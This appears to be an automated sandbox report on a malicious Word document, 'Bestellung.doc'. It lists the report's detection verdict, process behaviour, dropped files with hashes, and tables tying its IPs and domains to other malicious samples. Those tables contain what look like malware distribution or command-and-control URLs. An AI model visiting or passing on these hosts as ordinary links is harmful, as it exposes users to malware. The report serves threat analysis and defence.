                                                          Number of analysed new started processes analysed:12
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • GSI enabled (VBA)
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.evad.winDOC@16/12@6/12
                                                          EGA Information:
                                                          • Successful, ratio: 80%
                                                          HDC Information:
                                                          • Successful, ratio: 8.5% (good quality ratio 8.1%)
                                                          • Quality average: 72.1%
                                                          • Quality standard deviation: 25.3%
                                                          HCA Information:
                                                          • Successful, ratio: 61%
                                                          • Number of executed functions: 0
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          • Found application associated with file extension: .doc
                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                          • Found warning dialog
                                                          • Click Ok
                                                          • Attach to Office via COM
                                                          • Scroll down
                                                          • Close Viewer
                                                          Warnings:
                                                          Show All
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                          • TCP Packets have been reduced to 100
                                                          • Excluded IPs from analysis (whitelisted): 205.185.216.10, 205.185.216.42, 23.55.161.155, 23.55.161.165, 23.55.161.158, 23.55.161.156, 23.55.161.159, 23.55.161.169, 23.55.161.163, 23.55.161.160, 23.55.161.164
                                                          • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, a767.dscg3.akamai.net, au-bg-shim.trafficmanager.net
                                                          • Execution Graph export aborted for target powershell.exe, PID 2396 because it is empty
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          10:48:38API Interceptor1x Sleep call for process: msg.exe modified
                                                          10:48:38API Interceptor55x Sleep call for process: powershell.exe modified
                                                          10:48:46API Interceptor309x Sleep call for process: rundll32.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          104.21.88.166N00048481397007.docGet hashmaliciousBrowse
                                                            Order.docGet hashmaliciousBrowse
                                                              N00048481397007.docGet hashmaliciousBrowse
                                                                203.157.152.9Beauftragung.docGet hashmaliciousBrowse
                                                                • 203.157.152.9:7080/1mknma6mw3iwffexp2/
                                                                Reservierung.docGet hashmaliciousBrowse
                                                                • 203.157.152.9:7080/6eve8qas5/0i5mfaii/p8bez9p65uc19f4/grju6ta/
                                                                Beorderung.docGet hashmaliciousBrowse
                                                                • 203.157.152.9:7080/xjj84/c3o6r1ebhyxncr9/9sjisujiufchwydnol9/rkuxo00mhg/
                                                                Bestellung.docGet hashmaliciousBrowse
                                                                • 203.157.152.9:7080/y4p99euagxraa4zj/2wbjd3933k44x/1is5p89u2lc009/atph/h2r0ok8wa30trloqlf9/
                                                                Inv DK448.docGet hashmaliciousBrowse
                                                                • 203.157.152.9:7080/3lec7urzx75mbq0/jwg3osdiklskv3/
                                                                Invoice S2517158.docGet hashmaliciousBrowse
                                                                • 203.157.152.9:7080/nqu8y0186o53/1aptxcpbn3iz11tn/ulw3e69cw2/
                                                                http://xichengkeji.top/classic-retro-l8swk/3926bosets0n4/u2cfhti77-96Get hashmaliciousBrowse
                                                                • 203.157.152.9:7080/m8k9od75wi4wt2s131/ldx9ip66uu7zrrcv1qt/dx6l/aupcslxxe4sj3op4i/k3lns8t/
                                                                45.138.97.75N00048481397007.docGet hashmaliciousBrowse
                                                                • e-wdesign.eu/wp-content/bn1IgDejh/
                                                                132.248.38.158#Uc1a1#Uc7a5-00612648.docGet hashmaliciousBrowse
                                                                • 132.248.38.158/yf2wjcvi6/60rjwltgcms8/
                                                                LKTD0004377.docGet hashmaliciousBrowse
                                                                • 132.248.38.158/y47s4wbq5jdgmp/
                                                                Factura.docGet hashmaliciousBrowse
                                                                • 132.248.38.158/1arag0n/69481/2soazke/yet0q2fu2qwgdp/
                                                                Rechnung.docGet hashmaliciousBrowse
                                                                • 132.248.38.158/6ztw7ho3/p2d2b0z/5hejpovw88qdn3efdcl/2zk1v2mwr/2caf88a/
                                                                Beauftragung.docGet hashmaliciousBrowse
                                                                • 132.248.38.158/lchv/7umw59pmbjp9ig6/t90nvqvsqy/jp7io7c3iearir101/dngj5o2t5r/
                                                                Bericht.docGet hashmaliciousBrowse
                                                                • 132.248.38.158/mmpbaeha08ev42/0ngpi/e74k177/
                                                                172.217.6.174N00048481397007.docGet hashmaliciousBrowse
                                                                • nightlifemumbai.club/x/0wBD3/
                                                                Order.docGet hashmaliciousBrowse
                                                                • nightlifemumbai.club/x/0wBD3/
                                                                N00048481397007.docGet hashmaliciousBrowse
                                                                • nightlifemumbai.club/x/0wBD3/
                                                                Scan_Image_From_QUINNEY_&_ASSOCIATES.pdfGet hashmaliciousBrowse
                                                                • crl.pki.goog/GTSGIAG3.crl
                                                                d5#U309a.docGet hashmaliciousBrowse
                                                                • clients1.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih%2BZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCEbXmsCz9vTc

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                traumfrauen-ukraine.deN00048481397007.docGet hashmaliciousBrowse
                                                                • 212.227.200.73
                                                                N00048481397007.docGet hashmaliciousBrowse
                                                                • 212.227.200.73
                                                                e-wdesign.euN00048481397007.docGet hashmaliciousBrowse
                                                                • 45.138.97.75
                                                                jflmktg.wpcomstaging.comN00048481397007.docGet hashmaliciousBrowse
                                                                • 192.0.78.20
                                                                N00048481397007.docGet hashmaliciousBrowse
                                                                • 192.0.78.20
                                                                shop.nowfal.devN00048481397007.docGet hashmaliciousBrowse
                                                                • 104.21.88.166
                                                                Order.docGet hashmaliciousBrowse
                                                                • 104.21.88.166
                                                                N00048481397007.docGet hashmaliciousBrowse
                                                                • 104.21.88.166
                                                                nightlifemumbai.clubN00048481397007.docGet hashmaliciousBrowse
                                                                • 172.217.6.174
                                                                Order.docGet hashmaliciousBrowse
                                                                • 172.217.6.174
                                                                N00048481397007.docGet hashmaliciousBrowse
                                                                • 172.217.6.174

                                                                ASN

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                MOPH-TH-APInformationTechnologyOfficeSGBeauftragung.docGet hashmaliciousBrowse
                                                                • 203.157.152.9
                                                                Reservierung.docGet hashmaliciousBrowse
                                                                • 203.157.152.9
                                                                Beorderung.docGet hashmaliciousBrowse
                                                                • 203.157.152.9
                                                                Bestellung.docGet hashmaliciousBrowse
                                                                • 203.157.152.9
                                                                Inv DK448.docGet hashmaliciousBrowse
                                                                • 203.157.152.9
                                                                Invoice S2517158.docGet hashmaliciousBrowse
                                                                • 203.157.152.9
                                                                http://xichengkeji.top/classic-retro-l8swk/3926bosets0n4/u2cfhti77-96Get hashmaliciousBrowse
                                                                • 203.157.152.9
                                                                GO-DADDY-COM-LLCUSRFQ.xlsxGet hashmaliciousBrowse
                                                                • 198.71.232.3
                                                                bgJPIZIYby.exeGet hashmaliciousBrowse
                                                                • 184.168.131.241
                                                                E4Q30tDEB9.exeGet hashmaliciousBrowse
                                                                • 192.169.220.85
                                                                RevisedPO.24488_pdf.exeGet hashmaliciousBrowse
                                                                • 107.180.34.198
                                                                02131.docGet hashmaliciousBrowse
                                                                • 166.62.28.133
                                                                mensaje_012021_1-538086.docGet hashmaliciousBrowse
                                                                • 198.71.233.47
                                                                Notice 8283393_829.docGet hashmaliciousBrowse
                                                                • 192.169.223.13
                                                                message_zdm.htmlGet hashmaliciousBrowse
                                                                • 184.168.131.241
                                                                SAMSUNG C&T UPCOMING PROJECTS19-027-MP-010203.exe.exeGet hashmaliciousBrowse
                                                                • 107.180.25.166
                                                                79a2gzs3gkk.docGet hashmaliciousBrowse
                                                                • 166.62.10.32
                                                                davay (2).exeGet hashmaliciousBrowse
                                                                • 207.38.89.115
                                                                davay.exeGet hashmaliciousBrowse
                                                                • 207.38.89.115
                                                                message_zdm.htmlGet hashmaliciousBrowse
                                                                • 184.168.131.241
                                                                INFO.docGet hashmaliciousBrowse
                                                                • 166.62.10.32
                                                                MES-2021_01_22-3943960.docGet hashmaliciousBrowse
                                                                • 166.62.10.32
                                                                Documento 2201 01279.docGet hashmaliciousBrowse
                                                                • 166.62.10.32
                                                                Shipping Document PL&BL Draft.exeGet hashmaliciousBrowse
                                                                • 184.168.131.241
                                                                ANHANGUD135IMI2373.docGet hashmaliciousBrowse
                                                                • 166.62.28.114
                                                                Payment _Arabian Parts Co BSC#U00a9.exeGet hashmaliciousBrowse
                                                                • 198.71.232.3
                                                                Arch 30 S_07215.docGet hashmaliciousBrowse
                                                                • 198.71.233.96
                                                                CLOUDFLARENETUSRFQ RPM202011-776JD.jpg.lnkGet hashmaliciousBrowse
                                                                • 162.159.133.233
                                                                Revised-RBG-180129940.xlsxGet hashmaliciousBrowse
                                                                • 162.159.134.233
                                                                COSU6283389840.xlsxGet hashmaliciousBrowse
                                                                • 172.67.145.10
                                                                eTDAg77Nif.exeGet hashmaliciousBrowse
                                                                • 162.159.134.233
                                                                hG8XQh9hMy.exeGet hashmaliciousBrowse
                                                                • 172.67.142.109
                                                                IMG_1677.EXEGet hashmaliciousBrowse
                                                                • 104.21.19.200
                                                                gPGTcEMoM1.exeGet hashmaliciousBrowse
                                                                • 172.67.129.48
                                                                N00048481397007.docGet hashmaliciousBrowse
                                                                • 104.21.88.166
                                                                INGNhYonmgtGZ9Updf.exeGet hashmaliciousBrowse
                                                                • 104.21.26.55
                                                                Quotation for T10495.exeGet hashmaliciousBrowse
                                                                • 104.21.19.200
                                                                Monday, January 25, 2021 222135-ATT+723086453088056636775.htmGet hashmaliciousBrowse
                                                                • 104.16.18.94
                                                                Order.docGet hashmaliciousBrowse
                                                                • 104.21.88.166
                                                                SecuriteInfo.com.Heur.13954.xlsGet hashmaliciousBrowse
                                                                • 104.21.22.6
                                                                FileZilla_3.52.2_win64_sponsored-setup.exeGet hashmaliciousBrowse
                                                                • 162.159.200.1
                                                                PAYMENT INFO.xlsxGet hashmaliciousBrowse
                                                                • 104.16.18.94
                                                                PAYMENT INFO.xlsxGet hashmaliciousBrowse
                                                                • 104.16.18.94
                                                                qp38gXDG87.exeGet hashmaliciousBrowse
                                                                • 172.67.142.109
                                                                case_3499.xlsGet hashmaliciousBrowse
                                                                • 172.67.130.49
                                                                case.2991.xlsGet hashmaliciousBrowse
                                                                • 172.67.130.49
                                                                N00048481397007.docGet hashmaliciousBrowse
                                                                • 104.21.88.166

                                                                JA3 Fingerprints

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                05af1f5ca1b87cc9cc9b25185115607dRevised-RBG-180129940.xlsxGet hashmaliciousBrowse
                                                                • 104.21.88.166
                                                                • 212.227.200.73
                                                                • 192.0.78.20
                                                                N00048481397007.docGet hashmaliciousBrowse
                                                                • 104.21.88.166
                                                                • 212.227.200.73
                                                                • 192.0.78.20
                                                                Order.docGet hashmaliciousBrowse
                                                                • 104.21.88.166
                                                                • 212.227.200.73
                                                                • 192.0.78.20
                                                                SecuriteInfo.com.Heur.13954.xlsGet hashmaliciousBrowse
                                                                • 104.21.88.166
                                                                • 212.227.200.73
                                                                • 192.0.78.20
                                                                case_3499.xlsGet hashmaliciousBrowse
                                                                • 104.21.88.166
                                                                • 212.227.200.73
                                                                • 192.0.78.20
                                                                case.2991.xlsGet hashmaliciousBrowse
                                                                • 104.21.88.166
                                                                • 212.227.200.73
                                                                • 192.0.78.20
                                                                N00048481397007.docGet hashmaliciousBrowse
                                                                • 104.21.88.166
                                                                • 212.227.200.73
                                                                • 192.0.78.20
                                                                info5440.xlsGet hashmaliciousBrowse
                                                                • 104.21.88.166
                                                                • 212.227.200.73
                                                                • 192.0.78.20
                                                                notif-3615.xlsGet hashmaliciousBrowse
                                                                • 104.21.88.166
                                                                • 212.227.200.73
                                                                • 192.0.78.20
                                                                notif6158.xlsGet hashmaliciousBrowse
                                                                • 104.21.88.166
                                                                • 212.227.200.73
                                                                • 192.0.78.20
                                                                INC_Y5KPAYAWWU7.docGet hashmaliciousBrowse
                                                                • 104.21.88.166
                                                                • 212.227.200.73
                                                                • 192.0.78.20
                                                                mensaje_012021_1-538086.docGet hashmaliciousBrowse
                                                                • 104.21.88.166
                                                                • 212.227.200.73
                                                                • 192.0.78.20
                                                                eiW9G6sAIS.xlsmGet hashmaliciousBrowse
                                                                • 104.21.88.166
                                                                • 212.227.200.73
                                                                • 192.0.78.20
                                                                eiW9G6sAIS.xlsmGet hashmaliciousBrowse
                                                                • 104.21.88.166
                                                                • 212.227.200.73
                                                                • 192.0.78.20
                                                                2531 2212 2020 QG-826729.docGet hashmaliciousBrowse
                                                                • 104.21.88.166
                                                                • 212.227.200.73
                                                                • 192.0.78.20
                                                                USD_ Payment Schedule.xlsGet hashmaliciousBrowse
                                                                • 104.21.88.166
                                                                • 212.227.200.73
                                                                • 192.0.78.20
                                                                Arch 30 S_07215.docGet hashmaliciousBrowse
                                                                • 104.21.88.166
                                                                • 212.227.200.73
                                                                • 192.0.78.20
                                                                Info-237-602317.docGet hashmaliciousBrowse
                                                                • 104.21.88.166
                                                                • 212.227.200.73
                                                                • 192.0.78.20
                                                                Info-237-602317.docGet hashmaliciousBrowse
                                                                • 104.21.88.166
                                                                • 212.227.200.73
                                                                • 192.0.78.20
                                                                8776139.docmGet hashmaliciousBrowse
                                                                • 104.21.88.166
                                                                • 212.227.200.73
                                                                • 192.0.78.20

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                Category:dropped
                                                                Size (bytes):58936
                                                                Entropy (8bit):7.994797855729196
                                                                Encrypted:true
                                                                SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):326
                                                                Entropy (8bit):3.123186963792904
                                                                Encrypted:false
                                                                SSDEEP:6:kKn/swwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:v/vkPlE99SNxAhUegeT2
                                                                MD5:58751C83321658B822D07F96886AC97D
                                                                SHA1:9A2EAD2389445754B505B5C9EBB7B8004AB82248
                                                                SHA-256:B15FF38BF16C183D1D32FB26EEA232C5D3440D324BEDFB1860CAD1122011D65B
                                                                SHA-512:95738247FBF0252E9B99BC62DCDAFDFF9040ED9847C920C6614021EDEEA7C2F4D4A3A979387743EE2A55E9C6B86F283C6F37F89A706262B318BCCF09214D8EA9
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview: p...... ........C.......(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8AE8CBF3-349E-46EF-BF24-C3A751787722}.tmp
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):1024
                                                                Entropy (8bit):0.05390218305374581
                                                                Encrypted:false
                                                                SSDEEP:3:ol3lYdn:4Wn
                                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F1BBA518-FEA2-4C8F-A842-E861097210AC}.tmp
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):1536
                                                                Entropy (8bit):1.357318797251612
                                                                Encrypted:false
                                                                SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlb5:IiiiiiiiiifdLloZQc8++lsJe1Mz0l/
                                                                MD5:6EBEA8A29F9CE829445697F77DFF575C
                                                                SHA1:EFB7D697B8CA2D1372505D914D97F34C398A2DB3
                                                                SHA-256:24130780D2254809D96AD425061180079D45A7977FD81723F5201CDF815882DD
                                                                SHA-512:E36701EA5E533657E47758C46421E33DBFEB925FAA45B8521DC60F3859779CB2936E5311206E81FF273E59BAFEBC70B965F28AEFA845F94DDD2434CD6288913D
                                                                Malicious:false
                                                                Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                C:\Users\user\AppData\Local\Temp\Cab7446.tmp
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                Category:dropped
                                                                Size (bytes):58936
                                                                Entropy (8bit):7.994797855729196
                                                                Encrypted:true
                                                                SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                Malicious:false
                                                                Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                C:\Users\user\AppData\Local\Temp\Tar7447.tmp
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):152533
                                                                Entropy (8bit):6.31602258454967
                                                                Encrypted:false
                                                                SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                                MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                                SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                                SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                                SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                                Malicious:false
                                                                Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Bestellung.LNK
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Aug 26 14:08:14 2020, atime=Tue Jan 26 17:48:35 2021, length=145408, window=hide
                                                                Category:dropped
                                                                Size (bytes):2028
                                                                Entropy (8bit):4.537489843402864
                                                                Encrypted:false
                                                                SSDEEP:48:8x/XT0jFYyeDNyeD1o4Qh2x/XT0jFYyeDNyeD1o4Q/:8x/XojFYyeQeRbQh2x/XojFYyeQeRbQ/
                                                                MD5:03C028B20A018596DE32CA7839217BF1
                                                                SHA1:03EA0C629A9F3F19273081BF28D1C2184086CBC7
                                                                SHA-256:9FBB99F78F3B7F2A2DFBAF9B503CD7CD92138FAE5E1BA86242B6892CC3A05D5D
                                                                SHA-512:5B2F0018C88009B2E1328EBDFFA1ECF3445AD52E7C4A63D002D8ED029404A1BAAD8FC3E600AD49C22960C42F5DF7E3955BA51FE5350E3E81698B74B676677F04
                                                                Malicious:false
                                                                Preview: L..................F.... ......{.....{...........8...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2..8..:R.. .BESTEL~1.DOC..J.......Q.y.Q.y*...8.....................B.e.s.t.e.l.l.u.n.g...d.o.c.......x...............-...8...[............?J......C:\Users\..#...................\\571345\Users.user\Desktop\Bestellung.doc.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.B.e.s.t.e.l.l.u.n.g...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......571345..........D_....3N...W...9F.C...........[D_....3N...W...9F.C..
                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):68
                                                                Entropy (8bit):4.303676356199029
                                                                Encrypted:false
                                                                SSDEEP:3:M19sJJFul/qJJFulmX19sJJFulv:Mc6ty6561
                                                                MD5:BD856F6AAF53F6047E897B1A11F44009
                                                                SHA1:2881B2C812A7A6FCAC8AB1FCE091CA16CEEEA48C
                                                                SHA-256:1DF6E64EF171D86A9944D6EC37DEB14ADFD43AABBC3115EA3B46731FE53944DD
                                                                SHA-512:18D7596336F486B4DB39AAE354CA90F0C67BD5C30274543091BEA9A812577C4A53845BE03E300FD641C33419ED87D74E82CC93916F24B45EAF99DE3EF3152F23
                                                                Malicious:false
                                                                Preview: [doc]..Bestellung.LNK=0..Bestellung.LNK=0..[doc]..Bestellung.LNK=0..
                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):162
                                                                Entropy (8bit):2.431160061181642
                                                                Encrypted:false
                                                                SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                Malicious:false
                                                                Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X5TV0P1DTRO3H8K2VU4A.temp
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):8016
                                                                Entropy (8bit):3.5877401993668956
                                                                Encrypted:false
                                                                SSDEEP:96:chQCsMqPqvsqvJCwoNz8hQCsMqPqvsEHyqvJCwor7zvlYYHOf8OPlUV/Iu:cyuoNz8ymHnor7zvOf8O8Iu
                                                                MD5:A1C086422CDDA67BE908D501597CF798
                                                                SHA1:5A3B7DC3D7777A25F4B774112BE82542CFA9EB38
                                                                SHA-256:B3811F245DE30C19318BAC9AF119066B6429894C233B704D8A270D37AF3ABDA9
                                                                SHA-512:48B00E3AF68DB4D1E76ED9271C1C49F2F5B877235C1D654CF2EC97F9C67E400C6C105485D01EE48F75E0D706E52BE723748C8A2CD6B61CDA13FDF4C01F695AFC
                                                                Malicious:false
